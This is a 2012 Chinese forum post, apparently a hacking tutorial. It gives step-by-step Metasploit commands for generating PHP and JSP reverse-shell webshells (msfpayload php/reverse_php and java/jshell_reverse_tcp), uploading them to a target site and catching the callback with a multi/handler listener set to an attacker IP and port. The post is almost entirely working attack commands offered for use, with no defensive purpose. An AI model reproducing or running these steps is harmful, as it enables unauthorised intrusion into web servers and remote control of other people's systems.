jsp和php的webshell反弹shell方法

2012/9/12 6:21:00  人气 802    计算机网络论坛  
jsp和php的webshell反弹shell方法
1 .生成WEBSHELL文件
msf>msfpayload php/reverse_php LHOST=你的IP LPORT=端口 R>XX.php
我的BT4是在/ROOT/ 目录 然后吧dis9.php加 才能运行
把dis9.php传进你的SHELL里 例如 www.XXX.com/XX.php
2 . 然后MSF设置接口模板和参数
msf>use multi/handler //进入 multi/handler 接口
msf exploit(handler)>set PAYLOAD php/reverse_php //写入模块 不清楚的可以先 info php/reverse_php 看看介绍
msf exploit(handler)>set LHOST 你的IP //生成XX.php的LHOST的IP 也就是你的IP 要一样
msf exploit(handler)>set LPORT 8080 //同上
msf exploit(handler)>exploit //执行
3.反弹SHELL
然后访问你的XX.php
www.XXX.com/XX.php
或者是用浏览器直接打开 www.XXX.com/XX.php
这样就会反弹一个SHELL
我们就可以继续FUCK ALL
































/
JSP
msfpayload java/j*shell_reverse_tcp LHOST=192.168.10.1 R>balckrootkit.jsp
msf>use exploit/multi/handler
msf exploit(handler)>set PAYLOAD java/j*shell_reverse_tcp
set PAYLOAD java/j*shell_reverse_tcp
msf exploit(handler)>set LHOST 192.168.10.1
LHOST =>192.168.10.1
-
这里没SET端口 默认的4444

. [input=21]若有一天在[/input][br][input=21]从来不服败[/input]

发表回复

   


  通知楼主
暂无回复!